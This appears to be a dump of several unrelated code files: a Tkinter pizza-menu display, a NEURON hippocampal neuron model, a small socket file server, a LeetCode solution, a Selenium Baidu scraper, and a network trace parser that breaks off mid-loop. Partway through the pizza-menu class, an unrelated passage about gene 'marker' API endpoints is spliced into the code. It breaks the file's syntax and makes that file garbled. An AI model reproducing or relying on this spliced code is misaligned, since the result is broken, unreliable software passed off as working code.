libraries.cells.AbstractCell import Cell\nfrom libraries.cells.titleCell import TitleCell\nfrom libraries.cells.pizzaCell import PizzaCell\nfrom libraries.cells.aggiuntaCell import AggiuntaCell\nfrom libraries.cells.insalataCell import InsalataCell\nfrom libraries.cells.allergeniCell import AllergeniCell\nfrom libraries.cells.newColumn import NewColumnCell\nfrom libraries.cells.imageCell import ImageCell\nfrom libraries.cells.socialLogos import SocialLogos\nfrom libraries.cells.simpleTextCell import SimpleTextCell\nfrom libraries.cells.subtitlePriceCell import SubtitlePriceCell\nfrom libraries.resourceHandler import Recources\nimport json\nfrom PIL import ImageTk,Image \nimport os\nfrom abc import ABC\n\nclass PizzaMenu(ABC):\n\n    _font_colors: dict\n    
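Example request shapes for the two resources above, relative to wherever the 'marker' namespace is mounted. 'GAD1' is an illustrative gene name, and the size/color segments must come from the enum lists defined at the top of the file:

#   GET /marker/GAD1/t_stat
#       -> all_for_marker('GAD1', 't_stat')
#   GET /marker/GAD1/dotplot/accuracy/mean_expression
#       -> all_for_marker_dotplot('GAD1', 'accuracy', 'mean_expression')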
_columnWidth: float\n\n allergens: dict\n\n resources: Recources\n\n def loadJsonData(self, fname):\n with open(fname) as f:\n return json.load(f)\n\n def connect2db(self, data):\n self.LHandler = LanguageHandler(data['languageSite'] + \"/\" + data['restaurantName'] + \".php\", data['defaultLanguage'], token=data['m_key'])\n\n def pizzeCreator(self, pizzaType=\"*\"): ### crea un dizionario con tutte le pizze e i suoi atributi\n \"\"\"\n creates a dictionary with all the pizzas that have the @pizzaType\n @pizzaType it's a list, or it can be \"*\" (default) for all elements\n \"\"\"\n pizze = []\n data = self.resources.get_pizzas(True)\n tipo_pizza = \"\"\n\n for i in data:\n if (i[\"nome_tipo\"] in pizzaType) or pizzaType == \"*\":\n if i[\"nome_tipo\"] != tipo_pizza:\n tipo_pizza = i[\"nome_tipo\"]\n pizze.append(TitleCell(self.window, i[\"nome_tipo\"], self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n pizzaAllergens = [self.allergens[x] for x in i[\"allergeni\"]] # filters the allergens to show only those that are in the pizza\n pizze.append(PizzaCell(self.window, i[\"nomePizza\"], self._font_colors[\"titolo\"], '€ {:,.2f}'.format(float(i[\"prezzo\"])), self._font_colors[\"price\"], {\"nome_italiano\" : capfirst(\", \".join(str(x) for x in i[\"ingredienti\"].split(\",\"))), \"nome_inglese\" : capfirst(\", \".join(str(x) for x in i[\"ingredientiInglese\"].split(\",\")))}, self._font_colors[\"generic_text\"], pizzaAllergens, [0, 0], self._columnWidth))\n \n return pizze\n\n def simpleTextCreator(self, text_list):\n \"\"\"\n creates a dictionary with all the simple text\n \"\"\"\n\n text = []\n\n for i in text_list:\n text.append(SimpleTextCell(self.window, i, self._font_colors[\"generic_text\"], 34, [0, 0], self._columnWidth))\n\n return text\n\n def newColumnCreator(self):\n return [NewColumnCell(self.window, [0, 0], self._columnWidth)]\n\n def menuSettimanaCreator(self):\n \"\"\"\n Creates menu della settimana\n \"\"\"\n menu_settimanale = self.resources.get_menu_settimanale()\n\n if len(menu_settimanale) == 0:\n return []\n \n widget_list = []\n widget_list.append(TitleCell(self.window, \"Menu pranzo\", self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n for i in menu_settimanale:\n widget_list.append(SubtitlePriceCell(self.window, i[\"day\"], self._font_colors[\"menu_settimanale\"], '€ {:,.2f}'.format(float(i[\"price\"])), self._font_colors[\"price\"], i[\"meal\"], self._font_colors[\"generic_text\"], [0, 0], self._columnWidth))\n\n return widget_list\n\n def aggiunteCreator(self):\n \"\"\"\n creates a dictionary with all the aggiunte\n \"\"\"\n aggiunteCell = []\n aggiunteCell.append(TitleCell(self.window, \"Aggiunte\", self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n aggiunte = self.resources.get_aggiunte()\n for i in aggiunte:\n aggiunteCell.append(AggiuntaCell(self.window, {\"nome_italiano\" : capfirst(i[\"nome_aggiunta\"]), \"nome_inglese\" : capfirst(i[\"nome_inglese\"])}, self._font_colors[\"generic_text\"], '€ {:,.2f}'.format(float(i[\"prezzo\"])), self._font_colors[\"price\"], [0, 0], self._columnWidth))\n\n return aggiunteCell\n\n def insalateCreator(self):\n \"\"\"\n creates a dictionary with all the \"insalate\"\n \"\"\"\n insalate = []\n data = self.resources.get_insalate(True)\n\n insalate.append(TitleCell(self.window, \"Insalate (+spianata)\", self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n for i in data:\n insalataAllergens = [self.allergens[x] for x in i[\"allergeni\"]] # filters the allergens to show only those that 
are in the pizza\n insalate.append(InsalataCell(self.window, i[\"nomeInsalata\"], self._font_colors[\"titolo\"], '€ {:,.2f}'.format(float(i[\"prezzo\"])), self._font_colors[\"price\"], {\"nome_italiano\" : capfirst(\", \".join(str(x) for x in i[\"ingredienti\"].split(\",\"))), \"nome_inglese\" : capfirst(\", \".join(str(x) for x in i[\"ingredientiInglese\"].split(\",\")))}, self._font_colors[\"generic_text\"], insalataAllergens, [0, 0], self._columnWidth))\n\n return insalate\n\n def allergeniCreator(self):\n allergens = self.loadAllergeni(scale=2)\n allergensList = []\n\n allergensList.append(TitleCell(self.window, \"Legenda allergeni\", self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n names, images = zip(*allergens.items())\n i = 0\n while (i < len(allergens)):\n if i+1 < len(allergens):\n allergensList.append(AllergeniCell(self.window, self._font_colors[\"generic_text\"], [0, 0], self._columnWidth, names[i], images[i], names[i+1], images[i+1]))\n else:\n allergensList.append(AllergeniCell(self.window, self._font_colors[\"generic_text\"], [0, 0], self._columnWidth, names[i], images[i]))\n \n i += 2\n\n return allergensList\n\n def logoCreator(self):\n targetFile = os.path.join(os.path.curdir, 'resources', 'images')\n image = Image.open(os.path.join(targetFile, \"Piccola-Italia-logo.png\"))\n return [ImageCell(self.window, image, [0, 0], self._columnWidth)]\n\n def loadSocialLogos(self):\n \"\"\"\n Loads all the social logos and returns a list with them\n \"\"\"\n targetFile = os.path.join(os.path.curdir, 'resources', 'social_logos')\n\n logos = []\n for image_name in os.listdir(targetFile):\n logos.append(Image.open(os.path.join(targetFile, image_name)))\n\n return [SocialLogos(self.window, logos, [0, 0], self._columnWidth)]\n\n def loadAllergeni(self, scale=1):\n \"\"\"\n Loads images of allergens\n @param scale is the scale of the images based on the default resolution\n \"\"\"\n targetFile = os.path.join(os.path.curdir, 'resources', \"allergeni\")\n resizeFormat = (self.windowSpecs.resolutionConverter(119/6*scale), self.windowSpecs.resolutionConverter(121/6*scale))\n\n uova = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"uova.png\")).resize(resizeFormat, Image.ANTIALIAS))\n pesce = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"pesce.png\")).resize(resizeFormat, Image.ANTIALIAS))\n noci = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"noci.png\")).resize(resizeFormat, Image.ANTIALIAS))\n soia = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"soia.png\")).resize(resizeFormat, Image.ANTIALIAS))\n glutine = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"glutine.png\")).resize(resizeFormat, Image.ANTIALIAS))\n latticini = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"latticini.png\")).resize(resizeFormat, Image.ANTIALIAS))\n return { \"uova\" : uova, \"pesce\" : pesce, \"noci\" : noci, \"soia\" : soia, \"glutine\" : glutine, \"latticini\" : latticini }\n\n def setFontColors(self, colors) -> None:\n \"\"\"\n Sets the font colors\n \"\"\"\n self._font_colors = colors\n\n\n def tkWindowSetup(self):\n \"\"\"\n - Creates a window(Tk) and a @screenDimension[width, height] that contains the current screen dimension\n - Sets the screen to full screen and creates an attribute @fullScreebState that tracks the full screen state\n - It binds: F12 to quitFullScreen(); F11 to FullScreen(); Escape to close()\n - Hides cursor\n \"\"\"\n self.window = tk.Tk()\n self.window.attributes('-fullscreen', True) \n self.fullScreenState = 
\n        self.window.bind(\"<F12>\", self.quitFullScreen)\n        self.window.bind(\"<F11>\", self.toggleFullScreen)\n        self.window.bind(\"<Escape>\", self.close)\n        self.windowSpecs = WindowSpecs()\n        self.screenDimension = self.windowSpecs.getScreenDimension()\n        self.window.config(cursor=\"none\")\n    \n    def close(self, event):\n        self.window.destroy()\n        exit()\n\n    def toggleFullScreen(self, event):\n        self.fullScreenState = not self.fullScreenState\n        self.window.attributes(\"-fullscreen\", self.fullScreenState)\n\n    def quitFullScreen(self, event):\n        self.fullScreenState = False\n        self.window.attributes(\"-fullscreen\", self.fullScreenState)\n\n    def show(self, menu):\n        \"\"\"\n        Shows the whole menu.\n        NOTE : must be called before update()\n        \"\"\"\n        self.CACHEDMENU = menu\n        if isinstance(menu, list):\n            for i in menu:\n                i.show()\n        else:\n            menu.show()\n\n    def update(self):\n        if isinstance(self.CACHEDMENU, list): # if there is more than one vertical grid\n            for i in self.CACHEDMENU:\n                i.updateCells()\n        else:\n            self.CACHEDMENU.updateCells()\n        self.window.after(5000, self.update)\n","repo_name":"Norby99/MenuPizze","sub_path":"libraries/pizzaMenu.py","file_name":"pizzaMenu.py","file_ext":"py","file_size_in_byte":9872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1664551241","text":"import numpy as np\nimport neuron\nfrom neuron import h, gui, load_mechanisms\nfrom CA1_plasticity.model.utils import RecordingVector\nfrom CA1_plasticity.model.utils import Synapse\nimport sys\n\n\nclass CA1:\n\n    def __init__(self, setting):\n        self.setting = setting\n        # h.nrn_load_dll('C:/Users/tomko/PycharmProjects/Neuron_CA1/Dist_tuft_LTP_CA1/mods/nrnmech.dll')\n        load_mechanisms('./mods/')\n        h.xopen('./hoc/morphology_ri06.nrn')\n        h.xopen('./hoc/naceaxon.nrn')\n        h.load_file('./hoc/resetNSeg.hoc')\n        h.xopen('./hoc/init.hoc')\n        h.load_file('./hoc/initializationAndRun.hoc')\n        h.initchannels(0)\n\n        self.soma = h.somaA\n        self.distTuft = h.distTuft\n        self.all_apicals = h.all_apicals\n        self.all_basals = h.all_basals\n        self.primary_apical_list = h.primary_apical_list\n\n        self.v_vec = h.Vector().record(self.soma(0.5)._ref_v)\n        self.t_vec = h.Vector().record(h._ref_t)\n        self.t_rs_vec = h.Vector().record(h._ref_t, self.setting['simulation']['RECORDING_STEP'])\n        self.dend_vecs = {}\n        self.nmda_ica_vecs = {}\n        self.ina_vecs = {}\n        self.calH_ica_vecs = {}\n        self.cai_vecs = {}\n        self.ogb_vecs = {}\n        self.pmp_vecs = {}\n        self.spines_v_vecs = []\n\n        self.stim = None\n        self.bcm = None\n        self.alpha_scout_vec = h.Vector()\n        self.d_vec = h.Vector()\n        self.p_vec = h.Vector()\n\n        self.synapses = {}\n        for dend in self.all_apicals:\n            self.synapses[dend.hname()] = []\n        for dend in self.all_basals:\n            self.synapses[dend.hname()] = []\n        self.syn_AMPA_count = 0\n        self.syn_NMDA_count = 0\n        self.net_cons = []\n        self.net_stims = []\n        self.rand_streams = []\n        self.vec_stims = []\n        self.apc_vec = h.Vector()\n\n        self.ns_spon = []\n        self.ns_terminals = []\n        self.vecs = []\n\n        self.spine_heads = []\n        self.spine_necks = []\n\n        self.stim_SEClamp = None\n        self.iclamp_t_vec = None\n        self.iclamp_amps_vec = None\n        self.ppStim = h.ppStim\n\n    def add_synapses_distTuf(self):\n        neurite_area = 0\n        neur_areas = h.Vector(h.numDistNeurites)\n        neur_names = []\n        sec_list_dist = []\n        num_dist_neurites = 0\n        for sec in self.distTuft:\n            num_dist_neurites = num_dist_neurites + 1\n            sec_list_dist.append(sec)\n            for x in sec:\n                neurite_area = neurite_area + x.area()\n            neur_areas.x[num_dist_neurites - 1] = neurite_area\n            neur_names.append(sec.hname())
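\n            # reset the running area total so the next section is accumulated from zero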
\n            neurite_area = 0\n\n        # DISTRIBUTE SYNAPSES\n        dist_neur_sum = neur_areas.sum()\n        norm_neur_areas = h.Vector()\n        nnaInt = h.Vector()\n        norm_neur_areas.copy(neur_areas)\n        norm_neur_areas.div(dist_neur_sum)\n        nnaInt.integral(norm_neur_areas)\n\n        rand_gen = h.Random(self.setting['simulation']['SEED'])\n        rand_gen.uniform(0, 1)\n        rand_gen_anat = h.Random(self.setting['simulation']['SEED'] + 1e6)\n        rand_gen_anat.uniform(0, 1)\n\n        AMPA_gmax = self.setting['synapse']['AMPA_GMAX'] * self.setting['synapse']['SCALING_FACTOR']\n        NMDA_gmax = self.setting['synapse']['NMDA_GMAX'] * self.setting['synapse']['SCALING_FACTOR']\n\n        cur_syn = 0\n        h('access somaA')\n        h('distance()')\n        for i in range(150):\n            cur_rand = rand_gen.repick()\n            while cur_rand > nnaInt.x[cur_syn]:\n                cur_syn = cur_syn + 1\n\n            h('access ' + neur_names[cur_syn])\n            cur_syn = 0\n            cur_rand_anat = rand_gen_anat.repick()\n            cur_rand_anat_B = (int(cur_rand_anat * h.nseg) * 2 + 1) / (h.nseg * 2)\n\n            syn_ampa = h.Exp2SynETDP_multNNb_precentred(cur_rand_anat_B)\n            syn_ampa.tau1 = self.setting['synapse']['AMPA_TAU1']\n            syn_ampa.tau2 = self.setting['synapse']['AMPA_TAU2']\n            syn_ampa.e = self.setting['synapse']['AMPA_E']\n            syn_ampa.start = self.setting['synapse']['AMPA_START']\n            syn_ampa.dtau = self.setting['synapse']['AMPA_DTAU']\n            syn_ampa.ptau = self.setting['synapse']['AMPA_PTAU']\n            syn_ampa.d = self.setting['synapse']['AMPA_D0']\n            syn_ampa.p = self.setting['synapse']['AMPA_P0']\n\n            syn = Synapse(synapse=syn_ampa, synapse_id=i, section=h.secname(),\n                          segment_x=cur_rand_anat_B,\n                          distance=h.distance(cur_rand_anat_B), weight_vec=h.Vector(),\n                          init_weight=AMPA_gmax,\n                          input_spikes_vec=h.Vector(), receptor='AMPA', type='perforated',\n                          d_amp_vec=h.Vector(), p_amp_vec=h.Vector())\n\n            self.synapses[h.secname()].append(syn)\n            self.syn_AMPA_count = self.syn_AMPA_count + 1\n\n            syn_nmda = h.Exp2SynNMDA_SLM(cur_rand_anat_B)\n            syn_nmda.tau1 = self.setting['synapse']['NMDA_TAU1']\n            syn_nmda.tau2 = self.setting['synapse']['NMDA_TAU1']\n            syn_nmda.e = self.setting['synapse']['NMDA_E']\n\n            syn = Synapse(synapse=syn_nmda, synapse_id=i, section=h.secname(),\n                          segment_x=cur_rand_anat_B,\n                          distance=h.distance(cur_rand_anat_B), weight_vec=h.Vector(),\n                          init_weight=NMDA_gmax,\n                          input_spikes_vec=h.Vector(), receptor='NMDA', type='perforated',\n                          d_amp_vec=h.Vector(), p_amp_vec=h.Vector())\n            self.synapses[h.secname()].append(syn)\n            self.syn_NMDA_count = self.syn_NMDA_count + 1\n\n        h('access somaA')\n        print('Total number of AMPA synapses: ' + str(self.syn_AMPA_count))\n        print('Total number of NMDA synapses: ' + str(self.syn_NMDA_count))\n\n    def print_dend_params(self, dend_name):\n        h('access somaA')\n        h('distance()')\n        for dend in self.all_apicals:\n            if dend.hname() == dend_name:\n                print(dend.name(), dend.L, dend.nseg)\n                print(dend.psection()['density_mechs'].keys())\n                print('---------------------------------------------------')\n                for seg in dend:\n                    xdist = h.distance(seg, sec=dend)\n                    print(seg, xdist, seg.diam, seg.cm, seg.g_pas, seg.gkabar_kad, seg.gkabar_kap, seg.gkdrbar_kdr,\n                          seg.gbar_nax, seg.gcalbar_calH)\n\n    def insert_current_clamp(self, section, x):\n        \"\"\"\n        Inserts a single pulse current clamp point process into a given section.\n\n        Parameters\n        ---------\n        section : neuron.hoc.HocObject\n            the section into which the current clamp will be placed\n        x : float\n            the position on the section\n        \"\"\"\n        self.stim = h.IClamp(section(x))\n\n    def insert_SEClamp(self, section, x):\n        \"\"\"\n        Inserts a single electrode voltage clamp point process into a given section.\n\n        Parameters\n        
---------\n section : neuron.hoc.HocObject\n the section into the current clamp will be placed\n x : float\n the possition on the section\n \"\"\"\n self.stim_SEClamp = h.SEClamp(section(x))\n self.stim_SEClamp.dur1 = self.setting['protocol']['SEClamp']['DUR1']\n self.stim_SEClamp.amp1 = self.setting['protocol']['SEClamp']['AMP1']\n\n def connect_ns_terminals(self):\n for sec in self.synapses:\n if len(self.synapses[sec]) > 0:\n i = 0\n while i < len(self.synapses[sec]):\n ns_terminal = single_pulse_NetStim()\n self.ns_terminals.append(ns_terminal)\n\n if self.synapses[sec][i].receptor == 'AMPA':\n self.synapses[sec][i].ns_terminal = ns_terminal\n nc1 = h.NetCon(ns_terminal, self.synapses[sec][i].synapse, 0, 0,\n self.synapses[sec][i].init_weight)\n self.synapses[sec][i].weight_vec.record(nc1._ref_weight[1],\n self.setting['simulation']['RECORDING_STEP'])\n nc1.record(self.synapses[sec][i].input_spikes)\n self.net_cons.append(nc1)\n\n if self.synapses[sec][i + 1].receptor == 'NMDA':\n self.synapses[sec][i + 1].ns_terminal = ns_terminal\n nc2 = h.NetCon(ns_terminal, self.synapses[sec][i + 1].synapse, 0, 0,\n self.synapses[sec][i + 1].init_weight)\n self.net_cons.append(nc2)\n i = i + 2\n\n def set_recording_vectors_dist_tuft(self):\n for sec in self.all_apicals:\n if sec.hname() in self.setting['dends_recordings']:\n d_vecs = []\n na_vecs = []\n calH_ica_vecs = []\n cai_vecs = []\n ogb_vecs = []\n pmp_vecs = []\n for seg in [0.1, 0.5, 0.9]: # for seg in sec.allseg():\n d_vec = RecordingVector(section=sec.hname(), segment_x=seg, vec=h.Vector().record(sec(seg)._ref_v))\n d_vecs.append(d_vec)\n na_vec = RecordingVector(section=sec.hname(), segment_x=seg,\n vec=h.Vector().record(sec(seg)._ref_ina_nax))\n na_vecs.append(na_vec)\n calH_vec = RecordingVector(section=sec.hname(), segment_x=seg,\n vec=h.Vector().record(sec(seg)._ref_ica_calH))\n calH_ica_vecs.append(calH_vec)\n cai_vec = RecordingVector(section=sec.hname(), segment_x=seg,\n vec=h.Vector().record(sec(seg)._ref_cai))\n cai_vecs.append(cai_vec)\n\n self.dend_vecs[sec.hname()] = d_vecs\n self.ina_vecs[sec.hname()] = na_vecs\n self.calH_ica_vecs[sec.hname()] = calH_ica_vecs\n self.cai_vecs[sec.hname()] = cai_vecs\n self.ogb_vecs[sec.hname()] = ogb_vecs\n self.pmp_vecs[sec.hname()] = pmp_vecs\n\n def apply_TTX(self):\n \"\"\"Simulates the application of TTX as a reduction of sodium channel conductance.\"\"\"\n for sec in self.dends:\n if h.ismembrane('nad', sec=sec):\n sec.gbar_nad = sec.gbar_nad * 0.2\n\n\n def set_theta_burst_iclamp(self, stim):\n \"\"\"\n Sets times for current injections for the theta burst pairing stimulation protocol.\n\n Parameters\n ----------\n stim : neuron.hoc.HocObject\n the object of single pulse current clamp point process\n \"\"\"\n stim.delay = 0\n stim.dur = 1e9\n stim.amp = 0\n\n t_start = self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_START']\n t_vec = np.zeros(0)\n for pattern in range(self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_PATTERNS_NUM']):\n for burst in range(self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_BURSTS_NUM']):\n t_stop = t_start + 1 + (self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_STIMULI_NUM'] - 1) * \\\n self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_INTERSPIKE_INTERVAL']\n burst_vec = np.arange(t_start,\n t_stop,\n self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_INTERSPIKE_INTERVAL'])\n t_vec = np.concatenate((t_vec, burst_vec), axis=0)\n # t_start = t_vec[-1] + 
self.setting['protocol']['theta_burst_pairing']['TBP_INTERBURST_INTERVAL']\n t_start = t_start + self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_INTERBURST_INTERVAL']\n t_start = t_start + self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_PATTERNS_INTERVAL']\n\n t_vec_iclamp = [0]\n for t in t_vec:\n t_vec_iclamp.append(t)\n t_vec_iclamp.append(t)\n t_vec_iclamp.append(t + self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_DUR'])\n t_vec_iclamp.append(t + self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_DUR'])\n t_vec_iclamp.append(self.setting['simulation']['TSTOP'])\n self.iclamp_t_vec = h.Vector(t_vec_iclamp)\n\n amps_vec = []\n for i in range(len(t_vec_iclamp)):\n if (i % 4 == 0) or (i % 4 == 1):\n amps_vec.append(0.0)\n elif (i % 4 == 2) or (i % 4 == 3):\n amps_vec.append(self.setting['protocol']['theta_burst_iclamp']['TB_ICLAMP_AMP'])\n self.iclamp_amps_vec = h.Vector(amps_vec)\n self.iclamp_amps_vec.play(stim._ref_amp, self.iclamp_t_vec, 1)\n\n def set_theta_burst(self):\n \"\"\"\n Sets the theta burst stimulation protocol using Vecstim objects.\n \"\"\"\n for sec in self.synapses:\n s = 0\n while s < len(self.synapses[sec]):\n t_start = self.setting['protocol']['theta_burst']['TB_START'] + np.random.rand()\n t_vec = np.zeros(0)\n for pattern in range(self.setting['protocol']['theta_burst']['TB_PATTERNS_NUM']):\n for burst in range(self.setting['protocol']['theta_burst']['TB_BURSTS_NUM']):\n t_stop = t_start + 1 + (\n self.setting['protocol']['theta_burst']['TB_STIMULI_NUM'] - 1) * \\\n self.setting['protocol']['theta_burst']['TB_INTERSPIKE_INTERVAL']\n burst_vec = np.arange(t_start, t_stop,\n self.setting['protocol']['theta_burst']['TB_INTERSPIKE_INTERVAL'])\n t_vec = np.concatenate((t_vec, burst_vec), axis=0)\n t_start = t_start + self.setting['protocol']['theta_burst']['TB_INTERBURST_INTERVAL']\n t_start = t_start + self.setting['protocol']['theta_burst']['TB_PATTERNS_INTERVAL']\n\n vec = h.Vector(t_vec)\n self.vecs.append(vec)\n vec_stim = h.VecStim()\n vec_stim.play(vec)\n self.vec_stims.append(vec_stim)\n nc_AMPA = h.NetCon(vec_stim, self.synapses[sec][s].ns_terminal, 0, 0, 1)\n self.net_cons.append(nc_AMPA)\n self.synapses[sec][s].stimulated = True\n nc_NMDA = h.NetCon(vec_stim, self.synapses[sec][s + 1].ns_terminal, 0, 0, 1)\n self.net_cons.append(nc_NMDA)\n self.synapses[sec][s + 1].stimulated = True\n s = s + 2\n\n def reset_recording_vectors(self):\n \"\"\"Resets all used recording vectors.\"\"\"\n self.v_vec.resize(0)\n self.t_vec.resize(0)\n self.apc_vec.resize(0)\n self.t_rs_vec.resize(0)\n self.d_vec.resize(0)\n self.p_vec.resize(0)\n\n for sec in self.synapses:\n for syn in self.synapses[sec]:\n syn.weight_vec.resize(0)\n syn.d_amp_vec.resize(0)\n syn.p_amp_vec.resize(0)\n syn.input_spikes.resize(0)\n\n for d in [self.dend_vecs, self.ina_vecs, self.cai_vecs, self.calH_ica_vecs, self.nmda_ica_vecs, self.pmp_vecs]:\n for sec in d:\n for vec in d[sec]:\n vec.vector.resize(0)\n\n for vec in self.spines_v_vecs:\n vec.vector.resize(0)\n\n\ndef genDendLocs(dends, nsyn, spread):\n # insert nsyn synapses to dendrites dends, uniform spread within a branch\n locs = []\n n_dends = len(dends)\n if isinstance(nsyn, list):\n nsyn = np.repeat(nsyn[0], len(dends))\n else:\n nsyn = np.repeat(nsyn, len(dends))\n for i_dend in np.arange(0, n_dends):\n dend = dends[i_dend]\n nsyn_dend = nsyn[i_dend]\n isd = (spread[1] - spread[0]) / float(nsyn_dend)\n pos = np.arange(spread[0], spread[1], isd)[0:nsyn_dend]\n\n if len(pos) != nsyn_dend:\n print('error: 
synapse number mismatch, stop simulation! dend:', i_dend, 'created=', len(pos), '!=',\n              nsyn_dend)\n        sys.exit(1)\n    for p in pos:\n        locs.append([dend, p])\n    return locs\n\n\ndef single_pulse_NetStim():\n    \"\"\"Creates a single pulse NetStim.\"\"\"\n    pulse = h.NetStim()\n    pulse.interval = 1\n    pulse.number = 1\n    pulse.start = -1e9\n    pulse.noise = 0\n    return pulse\n","repo_name":"tomko-neuron/ETDP-CA1","sub_path":"Dist_tuft_LTP_CA1/libcell.py","file_name":"libcell.py","file_ext":"py","file_size_in_byte":16597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33901632287","text":"from server_view import View\nimport json\nimport logging\n\n'''\nPROTOCOL FORMAT\n\nthe string is split into 2 parts, separated by a space\nCOMMAND space PARAMETER space PARAMETER ...\n\nFEATURES\n\n- upload : puts/uploads a file into storage\n  request : upload\n  parameter : nama_file, the name of the file to upload\n  response : upload succeeded -> 'File uploaded successfully.'\n             upload failed -> error\n\n- lihat : lists the files available on the server\n  request: lihat\n  parameter: none\n  response: the list of files on the server\n\n- download : fetches/downloads a file\n  request: download\n  parameter: nama_file, the name of the file to download\n  response: download succeeded -> 'File downloaded successfully.'\n            download failed -> error\n\n- if the command is not recognized, the server responds with ERRCMD\n\n'''\np = View()\n\nclass Machine:\n    def proses(self,string_to_process,connection):\n        s = string_to_process\n        cstring = s.split(\" \")\n        try:\n            command = cstring[0].strip()\n            if (command=='upload'):\n                logging.warning(\"uploading\")\n                nama_file = cstring[1].strip()\n\n                \"Receive the size of the uploaded file\"\n                ukuran_inbyte = connection.recv(4)\n                ukuran_asli = int.from_bytes(ukuran_inbyte,byteorder='big')\n\n\n                \"Receive the file itself\"\n                ukuran_diterima = 0\n                recv_data=b''\n                while ukuran_diterima < ukuran_asli:\n                    data = connection.recv(64)\n                    if data:\n                        recv_data+=data\n                        ukuran_diterima+=len(data)\n                    else:\n                        print(\"file received from the client\")\n                        break\n                p.upload(nama_file,recv_data)\n\n                return \"File uploaded successfully.\"\n\n            elif (command=='lihat'):\n                logging.warning(\"listing stored files\")\n                hasil = p.lihat()\n                return json.dumps(hasil)\n\n            elif (command=='download'):\n                logging.warning(\"downloading\")\n                nama = cstring[1].strip()\n\n                hasil = p.download(nama)\n                if not hasil:\n                    nol = 0\n                    nol = nol.to_bytes(4,byteorder='big')\n                    connection.send(nol)\n                    return \"File not found in storage.\"\n                ukuran = len(hasil['byte_data'])\n                ukuran_inbyte = ukuran.to_bytes(4,byteorder='big')\n                connection.send(ukuran_inbyte)\n                connection.sendall(hasil['byte_data'])\n                return \"File downloaded successfully.\"\n            else:\n                return \"ERRCMD\"\n        except:\n            return \"ERROR\"\n\n\nif __name__=='__main__':\n    pm = Machine()\n","repo_name":"paramastri/PROGJAR_05111740000019","sub_path":"tugas4/server_machine.py","file_name":"server_machine.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24662515248","text":"# Count the Number of Consistent Strings\n# You are given a string allowed consisting of distinct characters and an array of strings words. A string is consistent if all characters in the string appear in the string allowed.
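\n# For example, with allowed = \"ab\", the word \"aab\" is consistent while \"abc\" is not.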
\n# Return the number of consistent strings in the array words.\n\ndef countConsistentStrings (allowed, words) :\n    count = 0\n    for word in words :\n        consistent = True\n        for i in word :\n            if i not in allowed :\n                consistent = False\n                break\n        if consistent :\n            count += 1\n    return count\n    \nprint(countConsistentStrings(allowed=\"cad\", words=[\"cc\",\"acd\",\"b\",\"ba\",\"bac\",\"bad\",\"ac\",\"d\"]))","repo_name":"vibhatsu08/leetcode-python","sub_path":"countConsistentStrings.py","file_name":"countConsistentStrings.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"874791363","text":"\"\"\"\n    Author: 邱晨\n    Purpose: a self-study script that searches Baidu with selenium + PHANTOMJS\n    Source: https://zhuanlan.zhihu.com/p/27115580\n\"\"\"\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport requests\nimport time\n\nuser_agent = (\n    \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) \" +\n    \"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36\"\n)\n\ndcap = dict(DesiredCapabilities.PHANTOMJS)\ndcap[\"phantomjs.page.settings.userAgent\"] = user_agent\n\nbrowser = webdriver.PhantomJS(desired_capabilities=dcap, executable_path=r'C:\\\\Users\\\\qiuc\\\\AppData\\\\Roaming\\\\npm\\\\phantomjs.cmd')\nbrowser.set_window_size(1920, 1200) # optional\n\nurl = 'https://www.baidu.com/'\n\ndef get_Content():\n    \"\"\"\n    Fetch the search results\n    \"\"\"\n    results = browser.find_elements_by_class_name('t')\n    for result in results:\n        print('Title: {} Link: {}'.format(result.text, result.find_element_by_tag_name('a').get_attribute('href'))) \n    else:\n        print('----------------------------------------------------------------------------------------') \n\ndef main():\n    browser.get(url)\n    browser.implicitly_wait(3)\n    text = browser.find_element_by_id('kw')\n    text.send_keys('python') # you can type in whatever you want to search for\n    browser.find_element_by_id('su').submit()\n    get_Content()\n    for i in range(2):\n        next_btn = browser.find_element_by_class_name('n')\n        browser.get(next_btn.get_attribute('href'))\n        browser.implicitly_wait(3)\n        get_Content()\n\n\nif __name__ == '__main__':\n    main()","repo_name":"qiuchen100/Spiders","sub_path":"baidu_get.py","file_name":"baidu_get.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42505454544","text":"# reading event entries from trace.tr\ntrace_file = open(\"trace.tr\", \"r\")\n\nreceived_bytes = 0\ntotay_delay = 0\nsent_packets = 0\nreceived_packets = 0\ndropped_packets = 0\n\nstart_time = 0\nend_time = 0\n\nheader_bytes = 20\n\nsent_time = dict()\n\nfor line in trace_file:\n    split_list = line.split()\n\n    if start_time == 0:\n        start_time = 